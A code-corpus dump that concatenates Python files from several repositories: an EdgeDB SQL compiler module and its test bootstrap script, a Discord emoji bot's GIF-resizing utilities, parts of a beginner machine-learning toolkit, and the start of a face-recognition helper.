if env.output_format == context.OutputFormat.JSON:
# For JSON we just want to aggregate the whole thing
# into a JSON array.
subrvar = pgast.RangeSubselect(
subquery=stmt,
alias=pgast.Alias(
aliasname=env.aliases.get('aggw')
)
)
stmt_res = stmt.target_list[0]
if stmt_res.name is None:
stmt_res.name = env.aliases.get('v')
new_val = pgast.FuncCall(
name=('json_agg',),
args=[pgast.ColumnRef(name=[stmt_res.name])]
)
new_val = pgast.CoalesceExpr(
args=[
new_val,
pgast.Constant(val='[]')
]
)
result = pgast.SelectStmt(
target_list=[
pgast.ResTarget(
val=new_val
)
],
from_clause=[
subrvar
]
)
result.ctes = stmt.ctes
stmt.ctes = []
return result
else:
return stmt
```
#### File: pgsql/compiler/relctx.py
```python
import typing
from edb.lang.ir import ast as irast
from edb.lang.ir import utils as irutils
from edb.lang.schema import links as s_links
from edb.lang.schema import objtypes as s_objtypes
from edb.lang.schema import pointers as s_pointers
from edb.server.pgsql import ast as pgast
from edb.server.pgsql import common
from edb.server.pgsql import types as pg_types
from . import astutils
from . import context
from . import dbobj
from . import pathctx
def pull_path_namespace(
*, target: pgast.Query, source: pgast.BaseRangeVar,
replace_bonds: bool=True, ctx: context.CompilerContextLevel):
squery = source.query
if astutils.is_set_op_query(squery):
# Set op query
source_qs = [squery, squery.larg, squery.rarg]
else:
source_qs = [squery]
for source_q in source_qs:
s_paths = set()
if hasattr(source_q, 'value_scope'):
s_paths.update((p, 'value') for p in source_q.value_scope)
if hasattr(source_q, 'path_outputs'):
s_paths.update(source_q.path_outputs)
if hasattr(source_q, 'path_namespace'):
s_paths.update(source_q.path_namespace)
if hasattr(source_q, 'path_rvar_map'):
s_paths.update(source_q.path_rvar_map)
view_path_id_map = getattr(source_q, 'view_path_id_map', {})
for path_id, aspect in s_paths:
path_id = pathctx.reverse_map_path_id(path_id, view_path_id_map)
if path_id in source.query.path_id_mask:
continue
rvar = maybe_get_path_rvar(target, path_id, aspect=aspect, ctx=ctx)
if rvar is None:
pathctx.put_path_rvar(
target, path_id, source, aspect=aspect, env=ctx.env)
def find_rvar(
stmt: pgast.Query, *,
source_stmt: typing.Optional[pgast.Query]=None,
path_id: irast.PathId,
ctx: context.CompilerContextLevel) -> \
typing.Optional[pgast.BaseRangeVar]:
"""Find an existing range var for a given *path_id* in stmt hierarchy.
If a range var is visible in a given SQL scope denoted by *stmt*, or,
optionally, *source_stmt*, record it on *stmt* for future reference.
:param stmt:
The statement to ensure range var visibility in.
:param source_stmt:
An optional statement object which is used as the starting SQL scope
for range var search. If not specified, *stmt* is used as the
starting scope.
:param path_id:
The path ID of the range var being searched.
:param ctx:
Compiler context.
:return:
A range var instance if found, ``None`` otherwise.
"""
if source_stmt is None:
source_stmt = stmt
rvar = maybe_get_path_rvar(source_stmt, path_id=path_id,
aspect='value', ctx=ctx)
if rvar is not None:
pathctx.put_path_rvar_if_not_exists(
stmt, path_id, rvar, aspect='value', env=ctx.env)
src_rvar = maybe_get_path_rvar(source_stmt, path_id=path_id,
aspect='source', ctx=ctx)
if src_rvar is not None:
pathctx.put_path_rvar_if_not_exists(
stmt, path_id, src_rvar, aspect='source', env=ctx.env)
return rvar
def include_rvar(
stmt: pgast.Query, rvar: pgast.BaseRangeVar,
path_id: irast.PathId, *,
overwrite_path_rvar: bool=False,
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
"""Ensure that *rvar* is visible in *stmt* as a value/source aspect.
:param stmt:
The statement to include *rel* in.
:param rvar:
The range var node to join.
:param join_type:
JOIN type to use when including *rel*.
:param aspect:
The reference aspect of the range var.
:param ctx:
Compiler context.
"""
if path_id.is_objtype_path():
aspects = ['source', 'value']
else:
aspects = ['value']
return include_specific_rvar(
stmt, rvar=rvar, path_id=path_id,
overwrite_path_rvar=overwrite_path_rvar,
aspects=aspects, ctx=ctx)
def include_specific_rvar(
stmt: pgast.Query, rvar: pgast.BaseRangeVar,
path_id: irast.PathId, *,
overwrite_path_rvar: bool=False,
aspects: typing.Iterable[str]=('value',),
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
"""Make the *aspect* of *path_id* visible in *stmt* as *rvar*.
:param stmt:
The statement to include *rel* in.
:param rvar:
The range var node to join.
:param join_type:
JOIN type to use when including *rel*.
:param aspect:
The reference aspect of the range var.
:param ctx:
Compiler context.
"""
if not has_rvar(stmt, rvar, ctx=ctx):
rel_join(stmt, rvar, ctx=ctx)
# Make sure that the path namespace of *cte* is mapped
# onto the path namespace of *stmt*.
pull_path_namespace(target=stmt, source=rvar, ctx=ctx)
for aspect in aspects:
if overwrite_path_rvar:
pathctx.put_path_rvar(
stmt, path_id, rvar, aspect=aspect, env=ctx.env)
else:
pathctx.put_path_rvar_if_not_exists(
stmt, path_id, rvar, aspect=aspect, env=ctx.env)
return rvar
def has_rvar(
stmt: pgast.Query, rvar: pgast.BaseRangeVar, *,
ctx: context.CompilerContextLevel) -> bool:
while stmt is not None:
if pathctx.has_rvar(stmt, rvar, env=ctx.env):
return True
stmt = ctx.rel_hierarchy.get(stmt)
return False
def _get_path_rvar(
stmt: pgast.Query, path_id: irast.PathId, *,
aspect: str, ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
qry = stmt
while qry is not None:
rvar = pathctx.maybe_get_path_rvar(
qry, path_id, aspect=aspect, env=ctx.env)
if rvar is not None:
if qry is not stmt:
# Cache the rvar reference.
pathctx.put_path_rvar(stmt, path_id, rvar, aspect=aspect,
env=ctx.env)
return rvar, path_id
if qry.view_path_id_map:
path_id = pathctx.reverse_map_path_id(
path_id, qry.view_path_id_map)
qry = ctx.rel_hierarchy.get(qry)
raise LookupError(
f'there is no range var for {path_id} in {stmt}')
def get_path_rvar(
stmt: pgast.Query, path_id: irast.PathId, *,
aspect: str, ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
rvar, _ = _get_path_rvar(stmt, path_id, aspect=aspect, ctx=ctx)
return rvar
def get_path_var(
stmt: pgast.Query, path_id: irast.PathId, *,
aspect: str, ctx: context.CompilerContextLevel) -> pgast.OutputVar:
var = pathctx.maybe_get_path_var(
stmt, path_id=path_id, aspect=aspect, env=ctx.env)
if var is not None:
return var
else:
rvar, path_id = _get_path_rvar(stmt, path_id, aspect=aspect, ctx=ctx)
return pathctx.get_rvar_path_var(
rvar, path_id, aspect=aspect, env=ctx.env)
def maybe_get_path_rvar(
stmt: pgast.Query, path_id: irast.PathId, *,
aspect: str, ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
try:
return get_path_rvar(stmt, path_id, aspect=aspect, ctx=ctx)
except LookupError:
return None
def maybe_get_path_var(
stmt: pgast.Query, path_id: irast.PathId, *,
aspect: str, ctx: context.CompilerContextLevel) -> pgast.OutputVar:
try:
rvar, path_id = _get_path_rvar(stmt, path_id, aspect=aspect, ctx=ctx)
except LookupError:
return None
else:
try:
return pathctx.get_rvar_path_var(
rvar, path_id, aspect=aspect, env=ctx.env)
except LookupError:
return None
def new_empty_rvar(
ir_set: irast.EmptySet, *,
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
nullrel = pgast.NullRelation(path_id=ir_set.path_id)
rvar = dbobj.rvar_for_rel(nullrel, env=ctx.env)
rvar.path_scope.add(ir_set.path_id)
rvar.value_scope.add(ir_set.path_id)
return rvar
def new_root_rvar(
ir_set: irast.Set, *,
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
if not isinstance(ir_set.scls, s_objtypes.ObjectType):
raise ValueError('cannot create root rvar for non-object path')
set_rvar = dbobj.range_for_set(ir_set, env=ctx.env)
set_rvar.path_scope.add(ir_set.path_id)
set_rvar.value_scope.add(ir_set.path_id)
if ir_set.rptr and ir_set.rptr.is_inbound:
ptrcls = ir_set.rptr.ptrcls
ptr_info = pg_types.get_pointer_storage_info(
ptrcls, resolve_type=False, link_bias=False)
if ptr_info.table_type == 'ObjectType':
# Inline link
rref = dbobj.get_column(None, ptr_info.column_name,
nullable=not ptrcls.required)
set_rvar.path_scope.add(ir_set.path_id.src_path())
pathctx.put_rvar_path_output(
set_rvar, ir_set.path_id.src_path(),
aspect='identity', var=rref, env=ctx.env)
return set_rvar
def new_poly_rvar(
ir_set: irast.Set, *,
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
rvar = new_root_rvar(ir_set, ctx=ctx)
rvar.path_scope.add(ir_set.path_id.src_path())
return rvar
def new_pointer_rvar(
ir_ptr: irast.Pointer, *,
link_bias: bool=False,
src_rvar: pgast.BaseRangeVar,
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
ptrcls = ir_ptr.ptrcls
ptr_info = pg_types.get_pointer_storage_info(
ptrcls, resolve_type=False, link_bias=link_bias)
if ptr_info.table_type == 'ObjectType':
# Inline link
return _new_inline_pointer_rvar(
ir_ptr, ptr_info=ptr_info,
src_rvar=src_rvar, ctx=ctx)
else:
return _new_mapped_pointer_rvar(ir_ptr, ctx=ctx)
def _new_inline_pointer_rvar(
ir_ptr: irast.Pointer, *,
lateral: bool=True,
ptr_info: pg_types.PointerStorageInfo,
src_rvar: pgast.BaseRangeVar,
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
ptr_rel = pgast.SelectStmt()
ptr_rvar = dbobj.rvar_for_rel(ptr_rel, lateral=lateral, env=ctx.env)
ptr_rvar.query.path_id = ir_ptr.target.path_id.ptr_path()
is_inbound = ir_ptr.direction == s_pointers.PointerDirection.Inbound
if is_inbound:
far_pid = ir_ptr.source.path_id
else:
far_pid = ir_ptr.target.path_id
far_ref = pathctx.get_rvar_path_identity_var(
src_rvar, far_pid, env=ctx.env)
ptr_rvar.path_scope.add(far_pid)
pathctx.put_path_identity_var(ptr_rel, far_pid, var=far_ref, env=ctx.env)
return ptr_rvar
def _new_mapped_pointer_rvar(
ir_ptr: irast.Pointer, *,
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
ptrcls = ir_ptr.ptrcls
ptr_rvar = dbobj.range_for_pointer(ir_ptr, env=ctx.env)
# Set up references according to the link direction.
if isinstance(ptrcls, s_links.Link):
# XXX: fix this once Properties are Sources
src_ptr_info = pg_types.get_pointer_storage_info(
ptrcls.getptr(ctx.env.schema, 'std::source'), resolve_type=False)
src_col = src_ptr_info.column_name
else:
src_col = common.edgedb_name_to_pg_name('std::source')
source_ref = dbobj.get_column(None, src_col, nullable=False)
if isinstance(ptrcls, s_links.Link):
# XXX: fix this once Properties are Sources
tgt_ptr_info = pg_types.get_pointer_storage_info(
ptrcls.getptr(ctx.env.schema, 'std::target'), resolve_type=False)
tgt_col = tgt_ptr_info.column_name
else:
tgt_col = common.edgedb_name_to_pg_name('std::target')
target_ref = dbobj.get_column(None, tgt_col, nullable=not ptrcls.required)
if ir_ptr.direction == s_pointers.PointerDirection.Inbound:
near_ref = target_ref
far_ref = source_ref
else:
near_ref = source_ref
far_ref = target_ref
ptr_rvar.query.path_id = ir_ptr.target.path_id.ptr_path()
ptr_rvar.path_scope.add(ptr_rvar.query.path_id)
src_pid = ir_ptr.source.path_id
tgt_pid = ir_ptr.target.path_id
ptr_rvar.path_scope.add(src_pid)
pathctx.put_rvar_path_output(ptr_rvar, src_pid, aspect='identity',
var=near_ref, env=ctx.env)
pathctx.put_rvar_path_output(ptr_rvar, src_pid, aspect='value',
var=near_ref, env=ctx.env)
pathctx.put_rvar_path_output(ptr_rvar, tgt_pid, aspect='value',
var=far_ref, env=ctx.env)
if tgt_pid.is_objtype_path():
ptr_rvar.path_scope.add(tgt_pid)
pathctx.put_rvar_path_output(ptr_rvar, tgt_pid, aspect='identity',
var=far_ref, env=ctx.env)
return ptr_rvar
def new_rel_rvar(
ir_set: irast.Set, stmt: pgast.Query, *,
lateral: bool=True,
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
if irutils.is_scalar_view_set(ir_set):
ensure_bond_for_expr(ir_set, stmt, ctx=ctx)
return dbobj.rvar_for_rel(stmt, lateral=lateral, env=ctx.env)
def new_static_class_rvar(
ir_set: irast.Set, *,
lateral: bool=True,
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
set_rvar = new_root_rvar(ir_set, ctx=ctx)
clsname = pgast.Constant(val=ir_set.rptr.source.scls.material_type().name)
nameref = dbobj.get_column(
set_rvar, common.edgedb_name_to_pg_name('schema::name'),
nullable=False)
condition = astutils.new_binop(nameref, clsname, op='=')
substmt = pgast.SelectStmt()
include_rvar(substmt, set_rvar, ir_set.path_id, ctx=ctx)
substmt.where_clause = astutils.extend_binop(
substmt.where_clause, condition)
return new_rel_rvar(ir_set, substmt, ctx=ctx)
def semi_join(
stmt: pgast.Query, ir_set: irast.Set, src_rvar: pgast.BaseRangeVar, *,
ctx: context.CompilerContextLevel) -> pgast.BaseRangeVar:
"""Join an IR Set using semi-join."""
rptr = ir_set.rptr
ptrcls = rptr.ptrcls
ptr_info = pg_types.get_pointer_storage_info(
ptrcls, resolve_type=False, link_bias=False)
is_inline_ref = ptr_info.table_type == 'ObjectType'
# Target set range.
set_rvar = new_root_rvar(ir_set, ctx=ctx)
# Link range.
map_rvar = new_pointer_rvar(rptr, src_rvar=src_rvar, ctx=ctx)
# Target identity in the target range.
if rptr.is_inbound and is_inline_ref:
tgt_pid = ir_set.path_id.extend(ptrcls)
else:
tgt_pid = ir_set.path_id
tgt_ref = pathctx.get_rvar_path_identity_var(
set_rvar, tgt_pid, env=ctx.env)
include_rvar(
ctx.rel, map_rvar,
path_id=ir_set.path_id.ptr_path(), ctx=ctx)
pathctx.get_path_identity_output(ctx.rel, ir_set.path_id, env=ctx.env)
cond = astutils.new_binop(tgt_ref, ctx.rel, 'IN')
stmt.where_clause = astutils.extend_binop(
stmt.where_clause, cond)
return set_rvar
def ensure_source_rvar(
ir_set: irast.Set, stmt: pgast.Query, *,
ctx: context.CompilerContextLevel) \
-> pgast.BaseRangeVar:
rvar = maybe_get_path_rvar(stmt, ir_set.path_id, aspect='source', ctx=ctx)
if rvar is None:
scope_stmt = maybe_get_scope_stmt(ir_set.path_id, ctx=ctx)
if scope_stmt is None:
scope_stmt = ctx.rel
rvar = new_root_rvar(ir_set, ctx=ctx)
include_rvar(scope_stmt, rvar, path_id=ir_set.path_id, ctx=ctx)
return rvar
def ensure_bond_for_expr(
ir_set: irast.Set, stmt: pgast.Query, *, type='int',
ctx: context.CompilerContextLevel) -> None:
if ir_set.path_id.is_objtype_path():
# ObjectTypes have inherent identity
return
ensure_transient_identity_for_set(ir_set, stmt, type=type, ctx=ctx)
def ensure_transient_identity_for_set(
ir_set: irast.Set, stmt: pgast.Query, *,
ctx: context.CompilerContextLevel, type='int') -> None:
if type == 'uuid':
id_expr = pgast.FuncCall(
name=('edgedb', 'uuid_generate_v1mc',),
args=[],
)
else:
id_expr = pgast.FuncCall(
name=('row_number',),
args=[],
over=pgast.WindowDef()
)
pathctx.put_path_identity_var(stmt, ir_set.path_id,
id_expr, force=True, env=ctx.env)
pathctx.put_path_bond(stmt, ir_set.path_id)
def get_scope(
ir_set: irast.Set, *,
ctx: context.CompilerContextLevel) -> \
typing.Optional[irast.ScopeTreeNode]:
if ir_set.path_scope_id is None:
return None
else:
return ctx.scope_tree.root.find_by_unique_id(ir_set.path_scope_id)
def update_scope(
ir_set: irast.Set, stmt: pgast.Query, *,
ctx: context.CompilerContextLevel) -> None:
scope_tree = get_scope(ir_set, ctx=ctx)
if scope_tree is None:
return
ctx.scope_tree = scope_tree
ctx.path_scope = ctx.path_scope.new_child()
ctx.path_scope.update({p.path_id: stmt for p in scope_tree.path_children})
for child_path in scope_tree.get_all_paths():
parent_scope = scope_tree.parent
if parent_scope is None or not parent_scope.is_visible(child_path):
stmt.path_id_mask.add(child_path)
def get_scope_stmt(
path_id: irast.PathId, *,
ctx: context.CompilerContextLevel) -> pgast.Query:
stmt = ctx.path_scope.get(path_id)
if stmt is None and path_id.is_ptr_path():
stmt = ctx.path_scope.get(path_id.tgt_path())
if stmt is None:
raise LookupError(f'cannot find scope statement for {path_id}')
return stmt
def maybe_get_scope_stmt(
path_id: irast.PathId, *,
ctx: context.CompilerContextLevel) -> typing.Optional[pgast.Query]:
try:
return get_scope_stmt(path_id, ctx=ctx)
except LookupError:
return None
def rel_join(
query: pgast.Query, right_rvar: pgast.BaseRangeVar, *,
ctx: context.CompilerContextLevel) -> None:
condition = None
for path_id in right_rvar.path_scope:
lref = maybe_get_path_var(query, path_id, aspect='identity', ctx=ctx)
if lref is None:
lref = maybe_get_path_var(query, path_id, aspect='value', ctx=ctx)
if lref is None:
continue
rref = pathctx.get_rvar_path_identity_var(
right_rvar, path_id, env=ctx.env)
path_cond = astutils.join_condition(lref, rref)
condition = astutils.extend_binop(condition, path_cond)
if condition is None:
join_type = 'cross'
else:
join_type = 'inner'
if not query.from_clause:
query.from_clause.append(right_rvar)
if condition is not None:
query.where_clause = astutils.extend_binop(
query.where_clause, condition)
else:
larg = query.from_clause[0]
rarg = right_rvar
query.from_clause[0] = pgast.JoinExpr(
type=join_type, larg=larg, rarg=rarg, quals=condition)
if join_type == 'left':
right_rvar.nullable = True
if not right_rvar.is_distinct:
query.is_distinct = False
```
#### File: edgedb/tests/initlocal.py
```python
import argparse
import os.path
import shutil
import sys
import unittest
from edb.server import cluster as edgedb_cluster
from edb.server import _testbase as tb
class TestResult:
def wasSuccessful(self):
return True
class TestRunner:
def __init__(self):
self.cases = set()
def run(self, test):
self.cases.update(tb.get_test_cases([test]))
return TestResult()
def execute(tests_dir, conns):
runner = TestRunner()
unittest.main(
module=None,
argv=['unittest', 'discover', '-s', tests_dir],
testRunner=runner, exit=False)
tb.setup_test_cases(runner.cases, conns)
def die(msg):
print(f'FATAL: {msg}', file=sys.stderr)
sys.exit(1)
def parse_connect_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'-D', '--data-dir', type=str,
default=os.path.join(os.environ['HOME'], '.edgedb'),
help='database cluster directory (default ~/.edgedb)')
parser.add_argument(
'-s', '--start-directory', type=str,
help='directory to start test discovery from')
parser.add_argument(
'-j', '--jobs', type=int,
help='number of parallel processes to use (defaults to CPU count)')
args = parser.parse_args()
if args.start_directory:
testsdir = args.start_directory
else:
testsdir = os.path.abspath(os.path.dirname(__file__))
return testsdir, args.data_dir, args.jobs
def main():
tests_dir, data_dir, jobs = parse_connect_args()
if os.path.exists(data_dir):
if not os.path.isdir(data_dir):
die(f'{data_dir!r} exists and is not a directory')
if os.listdir(data_dir):
die(f'{data_dir!r} exists and is not empty')
if not jobs:
jobs = os.cpu_count()
cluster = edgedb_cluster.Cluster(data_dir)
print(f'Bootstrapping test EdgeDB instance in {data_dir}...')
try:
cluster.init()
cluster.start(port='dynamic', timezone='UTC')
except BaseException:
if os.path.exists(data_dir):
shutil.rmtree(data_dir)
raise
servers, conns = tb.start_worker_servers(cluster, num_workers=jobs)
destroy_cluster = False
try:
execute(tests_dir, conns)
print(f'Initialized and populated test EdgeDB instance in {data_dir}')
except BaseException:
destroy_cluster = True
raise
finally:
tb.shutdown_worker_servers(servers, destroy=destroy_cluster)
if __name__ == '__main__':
main()
``` |
{
"source": "1st-award/emojiBot",
"score": 3
} |
#### File: 1st-award/emojiBot/GIFConvert.py
```python
from PIL import Image
class ResizeFrame:
def __init__(self, length, gif, scale, actual_frames):
self.current = 0
self.stop = length
self.gif = gif
self.scale = scale
self.actual_frames = actual_frames
def __anext__(self):
return self
async def __anext__(self):
print(f"run async for... current {self.current} until {self.stop}")
if self.current < self.stop:
self.gif.seek(self.actual_frames[self.current])
new_frame = Image.new('RGBA', self.gif.size)
new_frame.paste(self.gif)
return new_frame.thumbnail(self.scale, Image.ANTIALIAS)
else:
raise StopAsyncIteration
def scale_gif(path, scale, new_path=None):
gif = Image.open(path)
if not new_path:
new_path = path
old_gif_information = {
'loop': bool(gif.info.get('loop', 1)),
'duration': gif.info.get('duration', 40),
'background': gif.info.get('background', 223),
'extension': gif.info.get('extension', (b'NETSCAPE2.0')),
'transparency': gif.info.get('transparency', 223)
}
new_frames = get_new_frames(gif, scale)
save_new_gif(new_frames, old_gif_information, new_path)
def get_new_frames(gif, scale):
new_frames = []
actual_frames = gif.n_frames
for frame in range(actual_frames):
gif.seek(frame)
new_frame = Image.new('RGBA', gif.size)
new_frame.paste(gif)
new_frame.thumbnail(scale, Image.ANTIALIAS)
new_frames.append(new_frame)
return new_frames
def save_new_gif(new_frames, old_gif_information, new_path):
new_frames[0].save(new_path,
save_all=True,
append_images=new_frames[1:],
duration=old_gif_information['duration'],
loop=old_gif_information['loop'],
background=old_gif_information['background'],
extension=old_gif_information['extension'],
transparency=old_gif_information['transparency'])
```
#### File: 1st-award/emojiBot/GuildEmojiUtil.py
```python
import SQLUtil
# global index
guild_emoji_list = []
# 이미지 명령어를 통해 이미지 파일 이름을 구합니다.
class SearchEmojiFileName:
def __init__(self, length, emoji_tuple_list, emoji_command):
self.current = 0
self.stop = length
self.emoji_tuple_list = emoji_tuple_list
self.emoji_command = emoji_command
self.emoji_file_name = None
def __aiter__(self):
return self
async def __anext__(self):
print(f"run async for... current {self.current} until {self.stop}")
if self.current < self.stop:
print(self.emoji_tuple_list[self.current][1], self.emoji_command)
if self.emoji_tuple_list[self.current][1] == self.emoji_command:
print("match!")
self.emoji_file_name = self.emoji_tuple_list[self.current][0]
self.current += 1
return self.emoji_file_name
else:
raise StopAsyncIteration
# guild_emoji_list에 있는 GuildEmoji.class를 반환합니다.
class SearchGuildClass:
def __init__(self, length, guild_list, guildID):
self.current = 0
self.stop = length
self.guild_list = guild_list
self.guildID = guildID
def __aiter__(self):
return self
async def __anext__(self):
print(f"run async for... current {self.current} until {self.stop}")
if self.current < self.stop:
if self.guild_list[self.current].guildID == self.guildID:
return self.guild_list[self.current]
self.current += 1
return None
else:
raise StopAsyncIteration
# db에 있는 길드 이미지를 램에 로드하기위한 class
class GuildEmoji:
def __init__(self, _guildID: int, _global_emoji_list):
print(f"new guild emoji class {_guildID}...")
self.guildID = _guildID
print("load guild emoji command")
self.emoji_tuple_list = SQLUtil.emoji_search_all(_guildID)
self.emoji_tuple_list.extend(_global_emoji_list)
print(self.guildID, self.emoji_tuple_list)
# 이미지 명령어를 통해 이미지 파일을 반환한다.
async def emoji_search(self, emoji_command: str):
async for emoji in SearchEmojiFileName(len(self.emoji_tuple_list), self.emoji_tuple_list, emoji_command):
print("result", emoji)
if emoji is not None:
return emoji
return None
# db와 동기화
def update_emoji_list(self):
self.emoji_tuple_list = SQLUtil.emoji_search_all(self.guildID)
# guild_emoji_list에서 guildID와 일치하는 GuildEmoji.class를 반환
async def get_guild_class(_guildID: int):
async for guild_class in SearchGuildClass(len(guild_emoji_list), guild_emoji_list, _guildID):
print("result", guild_class)
if guild_class is not None:
return guild_class
return None
```
#### File: 1st-award/emojiBot/ImojiUtil.py
```python
import discord
import GIFConvert
import os
import shutil
from PIL import Image
async def emoji_save(_emoji: discord.Attachment, _guildID: int):
print("emoji save...")
await _emoji.save(f"Emoji/{_guildID}/{_emoji.filename}")
print("emoji save complete")
if not _emoji.filename.endswith(".gif"):
emoji_resize_normal(_emoji.filename, _guildID)
else:
emoji_resize_gif(_emoji.filename, _guildID)
def emoji_remove(_emoji_filename: str, _guildID: int):
print("emoji remove...")
os.remove(f"Emoji/{_guildID}/{_emoji_filename}")
print("emoji remove complete...")
def emoji_dir_remove(_guildID: int):
print(f"removing emoji dir {_guildID}...")
shutil.rmtree(f"Emoji/{_guildID}")
print(f"remove {_guildID} complete")
# TODO 일반 사진도 변환 후 3MB가 넘어갈 수 있으므로 검사하는 함수 만들기
def emoji_resize_normal(_emoji_filename: str, _guildID: int):
print(f"normal resizing {_emoji_filename}...")
img = Image.open(f'Emoji/{_guildID}/{_emoji_filename}')
img_resize = img.resize((int(128), int(128)))
img_resize.save(f'Emoji/{_guildID}/{_emoji_filename}')
print(f"normal resizing {_emoji_filename} complete...")
# TODO 위에 적어놨듯이 사진도 변환후 3MB가 넘어갈 수 있으니 확인하는 함수 만들면서 밑에 확인하는 if문 제거 및 코드 정리 하기
# 1. 해상도는 높으나 크기가 적은 파일 2. 해상도는 낮으나 크기가 큰 파일
def emoji_resize_gif(_emoji_filename: str, _guildID: int):
print(f"gif resizing {_emoji_filename}...")
im = Image.open(f'Emoji/{_guildID}/{_emoji_filename}')
file_size = os.stat(f'Emoji/{_guildID}/{_emoji_filename}').st_size / pow(1024, 2)
w_size = im.size[0]
h_size = im.size[1]
print(w_size, h_size)
# 3mb이하는 resizing pass
if file_size <= 3:
return
# 3mb초과는 resizing 필요
else:
# 해상도와 크기가 큰 파일 -> 350, 350으로 고정
if w_size > 350 or h_size > 350:
w_size = h_size = 350
# 해상도가 350 350이하이며 최소크기(128 128)보다 큰파일 -> 128, 128로 고정
elif w_size > 128 or h_size > 128:
w_size, h_size = 128
# 해상도가 128이하이고 크기가 3mb가 넘어갈 때
else:
raise ValueError(f"GIF가 조건에 맞지 않습니다. `조건: 크기(3MB이하) 해상도(128X128이상)`\n"
f"`업로드한 파일크기: {round(file_size, 2)}MB`\t`해상도: {w_size}X{h_size}`")
print(w_size, h_size)
GIFConvert.scale_gif(f'Emoji/{_guildID}/{_emoji_filename}', (w_size, h_size))
file_size = os.stat(f'Emoji/{_guildID}/{_emoji_filename}').st_size / pow(1024, 2)
print(f"gif resizing {_emoji_filename} complete... {file_size}MB")
# 변환은 했지만 여전히 파일 크기가 3MB이상 일 때
if file_size > 3:
# Permission 에러 방지를 위해 im 변수 메모리에서 제거
del im
raise ValueError(f"크기 변경에는 성공했지만 조건에 만족하지 못해 실패했습니다.")
def is_support_format(_emoji_filename: str):
support_format_list = ["jpg", "png", "gif"]
for support_format in support_format_list:
if _emoji_filename.endswith(support_format):
return True
raise NotImplementedError("지원하지 않는 파일입니다.")
``` |
{
"source": "1stDayHack/1stdaykit",
"score": 3
} |
#### File: src/core/base.py
```python
class BaseClass(object):
"""
Inherit from me and follow my structure!
"""
def __init__(self,name,device='cpu'):
self.name = name
self.device = device
def predict(self):
raise NotImplementedError("To be implemented in individual module's script")
def prime(self):
raise NotImplementedError("To be implemented in individual module's script")
def visualize(self):
raise NotImplementedError("To be implemented in individual module's script")
```
#### File: src/core/sentiment.py
```python
import numpy as np
import torch
import matplotlib.pyplot as plt
from pprint import pprint
from transformers import AutoTokenizer, AutoModelWithLMHead, pipeline
from .utils import utils
from .base import BaseClass
class SentimentAnalyzer(BaseClass):
def __init__(self, name='Sentiment Analyzer'): #alt: distilbert-base-uncased-finetuned-sst-2-english
super().__init__(name)
#Init name and metadata
self.name = name
#Create net
# self.tokenizer = AutoTokenizer.from_pretrained("gpt2")
# self.model = AutoModelWithLMHead.from_pretrained("gpt2")
self.predictor = pipeline('sentiment-analysis')
def predict(self,text):
"""
Does sentiment analysis on a given text. In order to perform batch classification,
you can either call this predict() function in a for-loop or alternatively (advanced)
try to modify this predict() function to perform batch-inferencing.
Input:
text: str object. Seed text to be used for generation.
Output:
predictions: list object. Generated text.
"""
#Infer
output = self.predictor(text)
return output
def visualize(self,raw,output):
"""
Simple function to call pretty-print for a neater text representation.
Input:
raw: str object; default text
output: str object; obj returned by predict()
Output:
None
"""
#Print!
for idx,i in enumerate(raw):
pprint({"Raw Text":i,
"Sentiment":output[idx]['label'],
"Confidence":output[idx]['score']})
```
#### File: core/utils/utils.py
```python
import cv2
import numpy as np
from PIL import Image
"""-------------------------------------------------------------------------------
Helper Classes
-------------------------------------------------------------------------------"""
class MouseSelector():
"""
Helper class that takes an image and spits back out a set of bounding box coordinates
as drawn by the user with a mouse.
"""
def __init__(self):
self.ref_point = []
self.crop = False
def _shape_selection(self, event, x, y, flags, param):
# if the left mouse button was clicked, record the starting
# (x, y) coordinates and indicate that cropping is being performed
if event == cv2.EVENT_LBUTTONDOWN:
self.ref_point = [(x, y)]
# check to see if the left mouse button was released
elif event == cv2.EVENT_LBUTTONUP:
# record the ending (x, y) coordinates and indicate that
# the cropping operation is finished
self.ref_point.append((x, y))
# draw a rectangle around the region of interest
cv2.rectangle(self.image, self.ref_point[0], self.ref_point[1], (0, 255, 0), 2)
cv2.imshow("base image", self.image)
def select(self,image):
#Set image and create window
self.image = image
clone = self.image.copy()
cv2.namedWindow("image")
cv2.setMouseCallback("image", self._shape_selection)
# keep looping until the 'q' key is pressed
while True:
# display the image and wait for a keypress
cv2.imshow("image", self.image)
key = cv2.waitKey(1) & 0xFF
# press 'r' to reset the window
if key == ord("r"):
self.image = clone.copy()
# if the 'c' key is pressed, break from the loop
elif key == ord("c"):
break
if len(self.ref_point) == 2:
crop_img = clone[self.ref_point[0][1]:self.ref_point[1][1], self.ref_point[0][0]:
self.ref_point[1][0]]
cv2.imshow("crop_img", crop_img)
cv2.waitKey(0)
# close all open windows
cv2.destroyAllWindows()
return [self.ref_point[0][1],
self.ref_point[1][1],
self.ref_point[0][0],
self.ref_point[1][0]]
"""-------------------------------------------------------------------------------
Helper Functions
-------------------------------------------------------------------------------"""
def pil_to_cv2(img):
"""
Converts PIL image to cv2 image
"""
img_ = np.array(img)
img_ = img_[:,:,::-1]
return img_
def cv2_to_pil(img):
"""
Converts cv2 image to PIL image
"""
img_ = img[:,:,::-1]
img_ = Image.fromarray(img_)
return img_
``` |
{
"source": "1step6thswmaestro/29",
"score": 3
} |
#### File: project/face_api_server/util.py
```python
import base64
import StringIO
import cStringIO
import urllib
import cv2
import datetime
import netifaces
import numpy as np
from PIL import Image
from proxy.face_database import FaceKind
def save_array(image_array, filename):
im = Image.fromarray(image_array)
im.save(filename)
def image_to_nparray(image):
buf = np.asarray(image)
rgbFrame = np.zeros((image.height, image.width, 3), dtype=np.uint8)
rgbFrame[:, :, 0] = buf[:, :, 0]
rgbFrame[:, :, 1] = buf[:, :, 1]
rgbFrame[:, :, 2] = buf[:, :, 2]
